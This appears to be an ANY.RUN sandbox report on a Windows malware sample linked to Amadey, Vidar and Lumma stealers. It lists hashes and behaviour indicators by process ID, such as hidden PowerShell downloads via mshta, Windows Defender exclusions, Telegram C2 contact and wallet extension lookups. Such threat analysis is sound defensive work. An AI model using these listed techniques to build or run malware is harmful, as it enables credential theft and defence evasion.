File name:

2025-05-15_d53e258194b9334b455b71f180de56a0_agent-tesla_amadey_black-basta_cobalt-strike_darkgate_elex_luca-stealer

Full analysis: https://app.any.run/tasks/f52cc552-a24f-42f4-98c6-d13fcd90a093
Verdict: Malicious activity
Threats:

Amadey is a formidable Windows infostealer threat, characterized by its persistence mechanisms, modular design, and ability to execute various malicious tasks.

Analysis date: May 15, 2025, 17:34:15
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
loader
amadey
botnet
stealer
telegram
vidar
rdp
lumma
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, 5 sections
MD5:

D53E258194B9334B455B71F180DE56A0

SHA1:

327E38E38E9F90D2292F138F66FEBAF54024922C

SHA256:

DF81C18F8D54F5F79CFE2CB269A3640FA81158E65F7AD885743B9AE8C99BE4B4

SSDEEP:

49152:4PPkzemqoSut3Jh4+QQ/btosJwIA4hHmZlKH2Tw/Pq83zw0bCjvk9G661QGtBTXo:qP/mp7t3T4+B/btosJwIA4hHmZlKH2TD

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Uses Task Scheduler to run other applications

      • cmd.exe (PID: 7392)
      • cmd.exe (PID: 2136)
      • cmd.exe (PID: 1324)
      • cmd.exe (PID: 3396)
      • cmd.exe (PID: 4260)
      • cmd.exe (PID: 7228)
      • cmd.exe (PID: 3124)
      • cmd.exe (PID: 2064)
      • cmd.exe (PID: 5544)
      • cmd.exe (PID: 5112)
      • cmd.exe (PID: 9740)
      • cmd.exe (PID: 8448)
      • cmd.exe (PID: 10656)
      • cmd.exe (PID: 10648)
      • cmd.exe (PID: 10600)
      • cmd.exe (PID: 10616)
      • cmd.exe (PID: 10584)
      • cmd.exe (PID: 10608)
      • cmd.exe (PID: 10804)
      • cmd.exe (PID: 5680)
      • cmd.exe (PID: 7092)
      • cmd.exe (PID: 10756)
      • cmd.exe (PID: 11872)
    • Run PowerShell with an invisible window

      • powershell.exe (PID: 7556)
      • powershell.exe (PID: 7320)
      • powershell.exe (PID: 6300)
      • powershell.exe (PID: 2900)
      • powershell.exe (PID: 7208)
      • powershell.exe (PID: 4864)
      • powershell.exe (PID: 6968)
      • powershell.exe (PID: 8832)
      • powershell.exe (PID: 7060)
      • powershell.exe (PID: 4832)
      • powershell.exe (PID: 8800)
      • powershell.exe (PID: 7352)
      • powershell.exe (PID: 4172)
      • powershell.exe (PID: 7840)
      • powershell.exe (PID: 8108)
      • powershell.exe (PID: 10276)
      • powershell.exe (PID: 10328)
      • powershell.exe (PID: 10352)
      • powershell.exe (PID: 11388)
      • powershell.exe (PID: 11380)
      • powershell.exe (PID: 11612)
      • powershell.exe (PID: 11672)
      • powershell.exe (PID: 11668)
      • powershell.exe (PID: 11732)
      • powershell.exe (PID: 11740)
      • powershell.exe (PID: 11748)
      • powershell.exe (PID: 11968)
      • powershell.exe (PID: 12160)
      • powershell.exe (PID: 12152)
      • powershell.exe (PID: 12268)
      • powershell.exe (PID: 11336)
      • powershell.exe (PID: 11228)
      • powershell.exe (PID: 12200)
      • powershell.exe (PID: 8444)
      • powershell.exe (PID: 11548)
      • powershell.exe (PID: 11248)
      • powershell.exe (PID: 10760)
    • Request from PowerShell that ran from MSHTA.EXE

      • powershell.exe (PID: 7556)
      • powershell.exe (PID: 7320)
      • powershell.exe (PID: 6300)
      • powershell.exe (PID: 2900)
      • powershell.exe (PID: 8832)
      • powershell.exe (PID: 8800)
      • powershell.exe (PID: 11248)
      • powershell.exe (PID: 10352)
    • Script downloads file (POWERSHELL)

      • powershell.exe (PID: 7556)
      • powershell.exe (PID: 7320)
      • powershell.exe (PID: 6300)
    • AMADEY mutex has been found

      • TempDCBPNQU8YYMBBKVUPIDGWKHWW2857ZJZ.EXE (PID: 780)
      • ramez.exe (PID: 7480)
      • TempS6KCU960NGBURKRV7YWDBN2SVQQEI1M0.EXE (PID: 7508)
      • TempLFOX537GDWXHM6AFWD7USNZFCNBKGAOH.EXE (PID: 6488)
    • AMADEY has been detected (SURICATA)

      • ramez.exe (PID: 7480)
    • Connects to the CnC server

      • ramez.exe (PID: 7480)
      • svchost.exe (PID: 2196)
    • AMADEY has been detected (YARA)

      • ramez.exe (PID: 7480)
    • VIDAR mutex has been found

      • MSBuild.exe (PID: 1240)
    • VIDAR has been detected (YARA)

      • MSBuild.exe (PID: 1240)
    • LUMMA has been detected (YARA)

      • MSBuild.exe (PID: 7316)
    • LUMMA has been detected (SURICATA)

      • svchost.exe (PID: 2196)
      • 1b02ced825.exe (PID: 2564)
      • MSBuild.exe (PID: 7316)
    • Adds path to the Windows Defender exclusion list

      • cmd.exe (PID: 7308)
      • NSudoLG.exe (PID: 9232)
    • Changes Windows Defender settings

      • NSudoLG.exe (PID: 9232)
    • Starts SC.EXE for service management

      • cmd.exe (PID: 7308)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • 2025-05-15_d53e258194b9334b455b71f180de56a0_agent-tesla_amadey_black-basta_cobalt-strike_darkgate_elex_luca-stealer.exe (PID: 7372)
      • 2025-05-15_d53e258194b9334b455b71f180de56a0_agent-tesla_amadey_black-basta_cobalt-strike_darkgate_elex_luca-stealer.exe (PID: 2284)
      • 2025-05-15_d53e258194b9334b455b71f180de56a0_agent-tesla_amadey_black-basta_cobalt-strike_darkgate_elex_luca-stealer.exe (PID: 4336)
      • 44c5c2a327.exe (PID: 8380)
      • cmd.exe (PID: 9588)
      • nircmd.exe (PID: 8468)
      • cmd.exe (PID: 9472)
      • NSudoLG.exe (PID: 7656)
      • cmd.exe (PID: 9212)
      • cmd.exe (PID: 7308)
      • Unlocker.exe (PID: 8276)
      • Unlocker.exe (PID: 6268)
      • Unlocker.exe (PID: 5804)
      • 4f700d268a.exe (PID: 10008)
      • Sigmanly_77bf68fec7208161f10bad2b7147677c36341eae9be966e6c0221c8e8c74f965.exe (PID: 9208)
      • Sigmanly_77bf68fec7208161f10bad2b7147677c36341eae9be966e6c0221c8e8c74f965.exe (PID: 9264)
      • Sigmanly_77bf68fec7208161f10bad2b7147677c36341eae9be966e6c0221c8e8c74f965.exe (PID: 8620)
      • Sigmanly_77bf68fec7208161f10bad2b7147677c36341eae9be966e6c0221c8e8c74f965.exe (PID: 4408)
      • Sigmanly_77bf68fec7208161f10bad2b7147677c36341eae9be966e6c0221c8e8c74f965.exe (PID: 8852)
      • Sigmanly_77bf68fec7208161f10bad2b7147677c36341eae9be966e6c0221c8e8c74f965.exe (PID: 976)
      • Sigmanly_77bf68fec7208161f10bad2b7147677c36341eae9be966e6c0221c8e8c74f965.exe (PID: 8004)
      • Sigmanly_77bf68fec7208161f10bad2b7147677c36341eae9be966e6c0221c8e8c74f965.exe (PID: 732)
      • Sigmanly_77bf68fec7208161f10bad2b7147677c36341eae9be966e6c0221c8e8c74f965.exe (PID: 7448)
      • Sigmanly_77bf68fec7208161f10bad2b7147677c36341eae9be966e6c0221c8e8c74f965.exe (PID: 9588)
      • Sigmanly_77bf68fec7208161f10bad2b7147677c36341eae9be966e6c0221c8e8c74f965.exe (PID: 10540)
      • Sigmanly_77bf68fec7208161f10bad2b7147677c36341eae9be966e6c0221c8e8c74f965.exe (PID: 10472)
      • Sigmanly_77bf68fec7208161f10bad2b7147677c36341eae9be966e6c0221c8e8c74f965.exe (PID: 7860)
      • Sigmanly_77bf68fec7208161f10bad2b7147677c36341eae9be966e6c0221c8e8c74f965.exe (PID: 8132)
      • Sigmanly_77bf68fec7208161f10bad2b7147677c36341eae9be966e6c0221c8e8c74f965.exe (PID: 10564)
      • Sigmanly_77bf68fec7208161f10bad2b7147677c36341eae9be966e6c0221c8e8c74f965.exe (PID: 11180)
      • Sigmanly_77bf68fec7208161f10bad2b7147677c36341eae9be966e6c0221c8e8c74f965.exe (PID: 11140)
      • Sigmanly_77bf68fec7208161f10bad2b7147677c36341eae9be966e6c0221c8e8c74f965.exe (PID: 11404)
      • Sigmanly_77bf68fec7208161f10bad2b7147677c36341eae9be966e6c0221c8e8c74f965.exe (PID: 10252)
    • Manipulates environment variables

      • powershell.exe (PID: 7556)
      • powershell.exe (PID: 7320)
      • powershell.exe (PID: 6300)
      • powershell.exe (PID: 2900)
      • powershell.exe (PID: 7208)
      • powershell.exe (PID: 4864)
      • powershell.exe (PID: 6968)
      • powershell.exe (PID: 8832)
      • powershell.exe (PID: 7060)
      • powershell.exe (PID: 4832)
      • powershell.exe (PID: 8800)
      • powershell.exe (PID: 7352)
      • powershell.exe (PID: 4172)
      • powershell.exe (PID: 7840)
      • powershell.exe (PID: 8108)
      • powershell.exe (PID: 10276)
      • powershell.exe (PID: 10328)
      • powershell.exe (PID: 10352)
      • powershell.exe (PID: 11388)
      • powershell.exe (PID: 11380)
      • powershell.exe (PID: 11612)
      • powershell.exe (PID: 11672)
      • powershell.exe (PID: 11668)
      • powershell.exe (PID: 11732)
      • powershell.exe (PID: 11740)
      • powershell.exe (PID: 11748)
      • powershell.exe (PID: 11968)
      • powershell.exe (PID: 12160)
      • powershell.exe (PID: 12152)
      • powershell.exe (PID: 11336)
      • powershell.exe (PID: 12268)
      • powershell.exe (PID: 11228)
      • powershell.exe (PID: 12200)
      • powershell.exe (PID: 11248)
      • powershell.exe (PID: 8444)
      • powershell.exe (PID: 10760)
      • powershell.exe (PID: 11548)
    • Starts process via Powershell

      • powershell.exe (PID: 7556)
      • powershell.exe (PID: 7320)
      • powershell.exe (PID: 6300)
      • powershell.exe (PID: 2900)
      • powershell.exe (PID: 7208)
      • powershell.exe (PID: 4864)
      • powershell.exe (PID: 6968)
      • powershell.exe (PID: 8832)
      • powershell.exe (PID: 7060)
      • powershell.exe (PID: 4832)
      • powershell.exe (PID: 8800)
      • powershell.exe (PID: 7352)
      • powershell.exe (PID: 4172)
      • powershell.exe (PID: 7840)
      • powershell.exe (PID: 10276)
      • powershell.exe (PID: 10328)
      • powershell.exe (PID: 10352)
      • powershell.exe (PID: 8108)
      • powershell.exe (PID: 11380)
      • powershell.exe (PID: 11388)
      • powershell.exe (PID: 11612)
      • powershell.exe (PID: 11672)
      • powershell.exe (PID: 11732)
      • powershell.exe (PID: 11740)
      • powershell.exe (PID: 11668)
      • powershell.exe (PID: 11748)
      • powershell.exe (PID: 11968)
      • powershell.exe (PID: 12160)
      • powershell.exe (PID: 12152)
      • powershell.exe (PID: 12200)
      • powershell.exe (PID: 12268)
      • powershell.exe (PID: 11336)
      • powershell.exe (PID: 11228)
      • powershell.exe (PID: 11248)
      • powershell.exe (PID: 8444)
      • powershell.exe (PID: 11548)
      • powershell.exe (PID: 10760)
    • Starts POWERSHELL.EXE for commands execution

      • mshta.exe (PID: 7408)
      • mshta.exe (PID: 5324)
      • mshta.exe (PID: 1188)
      • MSBuild.exe (PID: 1240)
      • NSudoLG.exe (PID: 9232)
      • mshta.exe (PID: 9972)
      • mshta.exe (PID: 6924)
      • mshta.exe (PID: 8020)
      • mshta.exe (PID: 10044)
      • mshta.exe (PID: 8296)
      • mshta.exe (PID: 8012)
      • mshta.exe (PID: 5084)
      • mshta.exe (PID: 5956)
      • mshta.exe (PID: 1196)
      • mshta.exe (PID: 10640)
      • mshta.exe (PID: 10664)
      • mshta.exe (PID: 10672)
      • mshta.exe (PID: 10812)
      • mshta.exe (PID: 10632)
      • mshta.exe (PID: 10592)
      • mshta.exe (PID: 10624)
      • mshta.exe (PID: 632)
      • mshta.exe (PID: 7872)
      • mshta.exe (PID: 11880)
      • mshta.exe (PID: 11028)
    • Found IP address in command line

      • powershell.exe (PID: 7556)
      • powershell.exe (PID: 7320)
      • powershell.exe (PID: 6300)
      • powershell.exe (PID: 2900)
      • powershell.exe (PID: 7208)
      • powershell.exe (PID: 4864)
      • powershell.exe (PID: 6968)
      • powershell.exe (PID: 8832)
      • powershell.exe (PID: 4832)
      • powershell.exe (PID: 8800)
      • powershell.exe (PID: 7060)
      • powershell.exe (PID: 7352)
      • powershell.exe (PID: 4172)
      • powershell.exe (PID: 7840)
      • powershell.exe (PID: 8108)
      • powershell.exe (PID: 10276)
      • powershell.exe (PID: 10328)
      • powershell.exe (PID: 10352)
      • powershell.exe (PID: 11388)
      • powershell.exe (PID: 11380)
      • powershell.exe (PID: 11612)
      • powershell.exe (PID: 11672)
      • powershell.exe (PID: 11668)
      • powershell.exe (PID: 11732)
      • powershell.exe (PID: 11740)
      • powershell.exe (PID: 11748)
      • powershell.exe (PID: 11968)
      • powershell.exe (PID: 12160)
      • powershell.exe (PID: 12152)
      • powershell.exe (PID: 12200)
      • powershell.exe (PID: 12268)
      • powershell.exe (PID: 11336)
      • powershell.exe (PID: 11228)
      • powershell.exe (PID: 11248)
      • powershell.exe (PID: 8444)
      • powershell.exe (PID: 10760)
      • powershell.exe (PID: 11548)
    • Probably download files using WebClient

      • mshta.exe (PID: 7408)
      • mshta.exe (PID: 5324)
      • mshta.exe (PID: 1188)
      • mshta.exe (PID: 9972)
      • mshta.exe (PID: 6924)
      • mshta.exe (PID: 8020)
      • mshta.exe (PID: 10044)
      • mshta.exe (PID: 8296)
      • mshta.exe (PID: 8012)
      • mshta.exe (PID: 5084)
      • mshta.exe (PID: 5956)
      • mshta.exe (PID: 1196)
      • mshta.exe (PID: 10664)
      • mshta.exe (PID: 10640)
      • mshta.exe (PID: 10672)
      • mshta.exe (PID: 10812)
      • mshta.exe (PID: 10632)
      • mshta.exe (PID: 10592)
      • mshta.exe (PID: 10624)
      • mshta.exe (PID: 632)
      • mshta.exe (PID: 7872)
      • mshta.exe (PID: 11880)
      • mshta.exe (PID: 11028)
    • Potential Corporate Privacy Violation

      • powershell.exe (PID: 7556)
      • powershell.exe (PID: 7320)
      • powershell.exe (PID: 6300)
      • ramez.exe (PID: 7480)
      • powershell.exe (PID: 2900)
      • powershell.exe (PID: 8832)
      • powershell.exe (PID: 8800)
      • powershell.exe (PID: 11388)
      • powershell.exe (PID: 11732)
      • powershell.exe (PID: 10352)
      • powershell.exe (PID: 12200)
      • powershell.exe (PID: 10760)
      • powershell.exe (PID: 11248)
    • Process requests binary or script from the Internet

      • powershell.exe (PID: 7556)
      • powershell.exe (PID: 7320)
      • powershell.exe (PID: 6300)
      • ramez.exe (PID: 7480)
      • powershell.exe (PID: 2900)
      • powershell.exe (PID: 8832)
      • powershell.exe (PID: 10352)
      • powershell.exe (PID: 8800)
      • powershell.exe (PID: 11388)
      • powershell.exe (PID: 11248)
      • powershell.exe (PID: 11732)
      • powershell.exe (PID: 10760)
      • powershell.exe (PID: 12200)
    • Connects to the server without a host name

      • powershell.exe (PID: 7556)
      • powershell.exe (PID: 7320)
      • powershell.exe (PID: 6300)
      • ramez.exe (PID: 7480)
      • powershell.exe (PID: 2900)
      • powershell.exe (PID: 8832)
      • powershell.exe (PID: 10352)
      • powershell.exe (PID: 8800)
      • powershell.exe (PID: 11388)
      • powershell.exe (PID: 11248)
      • powershell.exe (PID: 11732)
      • powershell.exe (PID: 10760)
      • powershell.exe (PID: 12200)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 7556)
      • powershell.exe (PID: 7320)
      • TempDCBPNQU8YYMBBKVUPIDGWKHWW2857ZJZ.EXE (PID: 780)
      • powershell.exe (PID: 6300)
      • ramez.exe (PID: 7480)
      • f790d43189.tmp (PID: 8184)
      • f790d43189.exe (PID: 7844)
      • csc.exe (PID: 8892)
      • csc.exe (PID: 9788)
      • csc.exe (PID: 9868)
      • csc.exe (PID: 208)
      • csc.exe (PID: 10000)
      • csc.exe (PID: 8480)
      • csc.exe (PID: 9660)
      • csc.exe (PID: 8756)
      • csc.exe (PID: 10112)
      • csc.exe (PID: 9764)
      • csc.exe (PID: 9784)
      • csc.exe (PID: 8984)
      • csc.exe (PID: 5044)
      • csc.exe (PID: 8464)
      • csc.exe (PID: 10108)
      • 44c5c2a327.exe (PID: 8380)
      • 7z.exe (PID: 9004)
      • Unlocker.exe (PID: 6268)
      • cmd.exe (PID: 7308)
      • powershell.exe (PID: 2900)
      • powershell.exe (PID: 8832)
      • powershell.exe (PID: 10352)
      • powershell.exe (PID: 11388)
      • powershell.exe (PID: 11732)
      • powershell.exe (PID: 10760)
      • powershell.exe (PID: 11248)
    • Reads security settings of Internet Explorer

      • TempDCBPNQU8YYMBBKVUPIDGWKHWW2857ZJZ.EXE (PID: 780)
      • ramez.exe (PID: 7480)
      • f790d43189.tmp (PID: 8184)
      • MSBuild.exe (PID: 1240)
    • Starts itself from another location

      • TempDCBPNQU8YYMBBKVUPIDGWKHWW2857ZJZ.EXE (PID: 780)
    • Contacting a server suspected of hosting an CnC

      • ramez.exe (PID: 7480)
      • svchost.exe (PID: 2196)
      • 1b02ced825.exe (PID: 2564)
      • MSBuild.exe (PID: 7316)
    • There is functionality for enable RDP (YARA)

      • ramez.exe (PID: 7480)
    • There is functionality for taking screenshot (YARA)

      • ramez.exe (PID: 7480)
      • MSBuild.exe (PID: 1240)
      • MSBuild.exe (PID: 7316)
    • Reads the Windows owner or organization settings

      • f790d43189.tmp (PID: 8184)
    • Executes application which crashes

      • core.exe (PID: 7592)
      • d0c70f73cf.exe (PID: 6080)
      • explorer.exe (PID: 5024)
    • Process communicates with Telegram (possibly using it as an attacker's C2 server)

      • MSBuild.exe (PID: 1240)
      • MSBuild.exe (PID: 7316)
    • The process executes via Task Scheduler

      • ramez.exe (PID: 3176)
      • ramez.exe (PID: 9364)
      • ramez.exe (PID: 13176)
    • Base64-obfuscated command line is found

      • MSBuild.exe (PID: 1240)
    • The process bypasses the loading of PowerShell profile settings

      • MSBuild.exe (PID: 1240)
    • The process hide an interactive prompt from the user

      • MSBuild.exe (PID: 1240)
    • BASE64 encoded PowerShell command has been detected

      • MSBuild.exe (PID: 1240)
    • Multiple wallet extension IDs have been found

      • MSBuild.exe (PID: 1240)
    • CSC.EXE is used to compile C# code

      • csc.exe (PID: 8892)
      • csc.exe (PID: 9788)
      • csc.exe (PID: 9868)
      • csc.exe (PID: 10000)
      • csc.exe (PID: 10108)
      • csc.exe (PID: 208)
      • csc.exe (PID: 8480)
      • csc.exe (PID: 9660)
      • csc.exe (PID: 8756)
      • csc.exe (PID: 10112)
      • csc.exe (PID: 9784)
      • csc.exe (PID: 9764)
      • csc.exe (PID: 8984)
      • csc.exe (PID: 5044)
      • csc.exe (PID: 8464)
    • Executing commands from a ".bat" file

      • 44c5c2a327.exe (PID: 8380)
      • cmd.exe (PID: 9588)
      • nircmd.exe (PID: 8468)
      • cmd.exe (PID: 9472)
      • NSudoLG.exe (PID: 7656)
      • cmd.exe (PID: 9212)
    • Application launched itself

      • cmd.exe (PID: 9588)
      • cmd.exe (PID: 9212)
      • cmd.exe (PID: 7308)
      • cmd.exe (PID: 9472)
      • ie4uinit.exe (PID: 8292)
      • setup.exe (PID: 3620)
      • setup.exe (PID: 4012)
      • setup.exe (PID: 7916)
    • Starts application with an unusual extension

      • cmd.exe (PID: 9292)
      • cmd.exe (PID: 8652)
      • cmd.exe (PID: 7308)
    • The executable file from the user directory is run by the CMD process

      • nircmd.exe (PID: 8468)
      • NSudoLG.exe (PID: 7656)
      • NSudoLG.exe (PID: 9232)
      • 7z.exe (PID: 9004)
      • Unlocker.exe (PID: 8276)
      • Unlocker.exe (PID: 6268)
      • Unlocker.exe (PID: 5804)
    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 8652)
      • cmd.exe (PID: 7308)
    • Get information on the list of running processes

      • cmd.exe (PID: 7308)
      • cmd.exe (PID: 9344)
    • PowerShell delay command usage (probably sleep evasion)

      • powershell.exe (PID: 9316)
    • Script adds exclusion path to Windows Defender

      • NSudoLG.exe (PID: 9232)
    • Using 'findstr.exe' to search for text patterns in files and output

      • cmd.exe (PID: 7308)
    • Windows service management via SC.EXE

      • sc.exe (PID: 5044)
      • sc.exe (PID: 5400)
      • sc.exe (PID: 4608)
      • sc.exe (PID: 2552)
      • sc.exe (PID: 5124)
      • sc.exe (PID: 2400)
      • sc.exe (PID: 9400)
      • sc.exe (PID: 9164)
      • sc.exe (PID: 9008)
      • sc.exe (PID: 7652)
      • sc.exe (PID: 8420)
      • sc.exe (PID: 8592)
      • sc.exe (PID: 9712)
      • sc.exe (PID: 9596)
      • sc.exe (PID: 3760)
      • sc.exe (PID: 8752)
      • sc.exe (PID: 9980)
      • sc.exe (PID: 10116)
      • sc.exe (PID: 9320)
      • sc.exe (PID: 8972)
      • sc.exe (PID: 8488)
      • sc.exe (PID: 8500)
      • sc.exe (PID: 10220)
      • sc.exe (PID: 9228)
      • sc.exe (PID: 1272)
      • sc.exe (PID: 4836)
      • sc.exe (PID: 6380)
      • sc.exe (PID: 5752)
      • sc.exe (PID: 6088)
      • sc.exe (PID: 8340)
      • sc.exe (PID: 5572)
      • sc.exe (PID: 4616)
      • sc.exe (PID: 10136)
      • sc.exe (PID: 9708)
      • sc.exe (PID: 9128)
      • sc.exe (PID: 9000)
      • sc.exe (PID: 2516)
      • sc.exe (PID: 7400)
      • sc.exe (PID: 7152)
      • sc.exe (PID: 9436)
      • sc.exe (PID: 2860)
    • Starts SC.EXE for service management

      • cmd.exe (PID: 2516)
      • cmd.exe (PID: 7308)
      • cmd.exe (PID: 8380)
      • cmd.exe (PID: 2392)
      • cmd.exe (PID: 8804)
    • Uses TASKKILL.EXE to kill process

      • cmd.exe (PID: 9560)
      • cmd.exe (PID: 7076)
      • cmd.exe (PID: 8400)
    • Drops a system driver (possible attempt to evade defenses)

      • Unlocker.exe (PID: 6268)
    • Uses RUNDLL32.EXE to load library

      • ie4uinit.exe (PID: 10208)
    • Uses TASKKILL.EXE to kill Browsers

      • 48c29040fd.exe (PID: 5260)
    • Stops a currently running service

      • sc.exe (PID: 9844)
      • sc.exe (PID: 9728)
      • sc.exe (PID: 2984)
      • sc.exe (PID: 9212)
      • sc.exe (PID: 9600)
      • sc.exe (PID: 10232)
      • sc.exe (PID: 10236)
      • sc.exe (PID: 9304)
      • sc.exe (PID: 10096)
      • sc.exe (PID: 8728)
      • sc.exe (PID: 8716)
      • sc.exe (PID: 8960)
      • sc.exe (PID: 4808)
      • sc.exe (PID: 6076)
      • sc.exe (PID: 7728)
      • sc.exe (PID: 1748)
      • sc.exe (PID: 140)
    • Deletes scheduled task without confirmation

      • schtasks.exe (PID: 4244)
      • schtasks.exe (PID: 5796)
      • schtasks.exe (PID: 660)
      • schtasks.exe (PID: 9792)
      • schtasks.exe (PID: 4040)
    • Process drops legitimate windows executable

      • cmd.exe (PID: 7308)
  • INFO

    • The sample compiled with english language support

      • 2025-05-15_d53e258194b9334b455b71f180de56a0_agent-tesla_amadey_black-basta_cobalt-strike_darkgate_elex_luca-stealer.exe (PID: 7372)
      • 44c5c2a327.exe (PID: 8380)
      • Unlocker.exe (PID: 6268)
      • cmd.exe (PID: 7308)
    • Reads mouse settings

      • 2025-05-15_d53e258194b9334b455b71f180de56a0_agent-tesla_amadey_black-basta_cobalt-strike_darkgate_elex_luca-stealer.exe (PID: 7372)
      • 2025-05-15_d53e258194b9334b455b71f180de56a0_agent-tesla_amadey_black-basta_cobalt-strike_darkgate_elex_luca-stealer.exe (PID: 2284)
      • 2025-05-15_d53e258194b9334b455b71f180de56a0_agent-tesla_amadey_black-basta_cobalt-strike_darkgate_elex_luca-stealer.exe (PID: 4336)
    • Create files in a temporary directory

      • 2025-05-15_d53e258194b9334b455b71f180de56a0_agent-tesla_amadey_black-basta_cobalt-strike_darkgate_elex_luca-stealer.exe (PID: 7372)
      • 2025-05-15_d53e258194b9334b455b71f180de56a0_agent-tesla_amadey_black-basta_cobalt-strike_darkgate_elex_luca-stealer.exe (PID: 2284)
      • 2025-05-15_d53e258194b9334b455b71f180de56a0_agent-tesla_amadey_black-basta_cobalt-strike_darkgate_elex_luca-stealer.exe (PID: 4336)
      • TempDCBPNQU8YYMBBKVUPIDGWKHWW2857ZJZ.EXE (PID: 780)
      • ramez.exe (PID: 7480)
      • f790d43189.tmp (PID: 8184)
      • f790d43189.exe (PID: 7844)
    • Checks supported languages

      • 2025-05-15_d53e258194b9334b455b71f180de56a0_agent-tesla_amadey_black-basta_cobalt-strike_darkgate_elex_luca-stealer.exe (PID: 7372)
      • 2025-05-15_d53e258194b9334b455b71f180de56a0_agent-tesla_amadey_black-basta_cobalt-strike_darkgate_elex_luca-stealer.exe (PID: 2284)
      • TempDCBPNQU8YYMBBKVUPIDGWKHWW2857ZJZ.EXE (PID: 780)
      • 2025-05-15_d53e258194b9334b455b71f180de56a0_agent-tesla_amadey_black-basta_cobalt-strike_darkgate_elex_luca-stealer.exe (PID: 4336)
      • ramez.exe (PID: 7480)
      • TempS6KCU960NGBURKRV7YWDBN2SVQQEI1M0.EXE (PID: 7508)
      • TempLFOX537GDWXHM6AFWD7USNZFCNBKGAOH.EXE (PID: 6488)
      • f790d43189.tmp (PID: 8184)
      • f790d43189.exe (PID: 7844)
      • core.exe (PID: 7592)
      • info.exe (PID: 5776)
      • MSBuild.exe (PID: 1240)
    • Reads the computer name

      • 2025-05-15_d53e258194b9334b455b71f180de56a0_agent-tesla_amadey_black-basta_cobalt-strike_darkgate_elex_luca-stealer.exe (PID: 7372)
      • 2025-05-15_d53e258194b9334b455b71f180de56a0_agent-tesla_amadey_black-basta_cobalt-strike_darkgate_elex_luca-stealer.exe (PID: 2284)
      • TempDCBPNQU8YYMBBKVUPIDGWKHWW2857ZJZ.EXE (PID: 780)
      • 2025-05-15_d53e258194b9334b455b71f180de56a0_agent-tesla_amadey_black-basta_cobalt-strike_darkgate_elex_luca-stealer.exe (PID: 4336)
      • ramez.exe (PID: 7480)
      • f790d43189.tmp (PID: 8184)
      • MSBuild.exe (PID: 1240)
    • Reads Internet Explorer settings

      • mshta.exe (PID: 7408)
      • mshta.exe (PID: 5324)
      • mshta.exe (PID: 1188)
    • Manual execution by a user

      • 2025-05-15_d53e258194b9334b455b71f180de56a0_agent-tesla_amadey_black-basta_cobalt-strike_darkgate_elex_luca-stealer.exe (PID: 2284)
      • 2025-05-15_d53e258194b9334b455b71f180de56a0_agent-tesla_amadey_black-basta_cobalt-strike_darkgate_elex_luca-stealer.exe (PID: 4336)
      • firefox.exe (PID: 7912)
      • Sigmanly_77bf68fec7208161f10bad2b7147677c36341eae9be966e6c0221c8e8c74f965.exe (PID: 9208)
      • Sigmanly_77bf68fec7208161f10bad2b7147677c36341eae9be966e6c0221c8e8c74f965.exe (PID: 9264)
      • Sigmanly_77bf68fec7208161f10bad2b7147677c36341eae9be966e6c0221c8e8c74f965.exe (PID: 8620)
      • Sigmanly_77bf68fec7208161f10bad2b7147677c36341eae9be966e6c0221c8e8c74f965.exe (PID: 4408)
      • Sigmanly_77bf68fec7208161f10bad2b7147677c36341eae9be966e6c0221c8e8c74f965.exe (PID: 8852)
      • Sigmanly_77bf68fec7208161f10bad2b7147677c36341eae9be966e6c0221c8e8c74f965.exe (PID: 976)
      • Sigmanly_77bf68fec7208161f10bad2b7147677c36341eae9be966e6c0221c8e8c74f965.exe (PID: 8004)
      • Sigmanly_77bf68fec7208161f10bad2b7147677c36341eae9be966e6c0221c8e8c74f965.exe (PID: 732)
      • Sigmanly_77bf68fec7208161f10bad2b7147677c36341eae9be966e6c0221c8e8c74f965.exe (PID: 7448)
      • Sigmanly_77bf68fec7208161f10bad2b7147677c36341eae9be966e6c0221c8e8c74f965.exe (PID: 8132)
      • Sigmanly_77bf68fec7208161f10bad2b7147677c36341eae9be966e6c0221c8e8c74f965.exe (PID: 7860)
      • Sigmanly_77bf68fec7208161f10bad2b7147677c36341eae9be966e6c0221c8e8c74f965.exe (PID: 9588)
      • Sigmanly_77bf68fec7208161f10bad2b7147677c36341eae9be966e6c0221c8e8c74f965.exe (PID: 10540)
      • Sigmanly_77bf68fec7208161f10bad2b7147677c36341eae9be966e6c0221c8e8c74f965.exe (PID: 10564)
      • Sigmanly_77bf68fec7208161f10bad2b7147677c36341eae9be966e6c0221c8e8c74f965.exe (PID: 11180)
      • Sigmanly_77bf68fec7208161f10bad2b7147677c36341eae9be966e6c0221c8e8c74f965.exe (PID: 11140)
      • Sigmanly_77bf68fec7208161f10bad2b7147677c36341eae9be966e6c0221c8e8c74f965.exe (PID: 10472)
      • Sigmanly_77bf68fec7208161f10bad2b7147677c36341eae9be966e6c0221c8e8c74f965.exe (PID: 11404)
      • Sigmanly_77bf68fec7208161f10bad2b7147677c36341eae9be966e6c0221c8e8c74f965.exe (PID: 10252)
    • Disables trace logs

      • powershell.exe (PID: 7556)
      • powershell.exe (PID: 7320)
      • powershell.exe (PID: 6300)
    • Checks proxy server information

      • powershell.exe (PID: 7556)
      • powershell.exe (PID: 7320)
      • powershell.exe (PID: 6300)
      • ramez.exe (PID: 7480)
      • MSBuild.exe (PID: 1240)
    • The executable file from the user directory is run by the Powershell process

      • TempDCBPNQU8YYMBBKVUPIDGWKHWW2857ZJZ.EXE (PID: 780)
      • TempS6KCU960NGBURKRV7YWDBN2SVQQEI1M0.EXE (PID: 7508)
      • TempLFOX537GDWXHM6AFWD7USNZFCNBKGAOH.EXE (PID: 6488)
      • TempSOE4JAJOCFAHXL0TKNLPGIU6HCMEXG58.EXE (PID: 3976)
      • Temp6P8HZJCHZ5QIJBPPVTYJD9XPAAU0KXJM.EXE (PID: 9908)
      • Temp0CBUI1MZKVV34WWI1IUD2QTMMB9OTEUU.EXE (PID: 8364)
      • TempFCXNLNJ3UWW6NYT3HLL5MMD7NNFR0VYC.EXE (PID: 10480)
      • Temp6P8HZJCHZ5QIJBPPVTYJD9XPAAU0KXJM.EXE (PID: 11124)
      • TempFCXNLNJ3UWW6NYT3HLL5MMD7NNFR0VYC.EXE (PID: 12332)
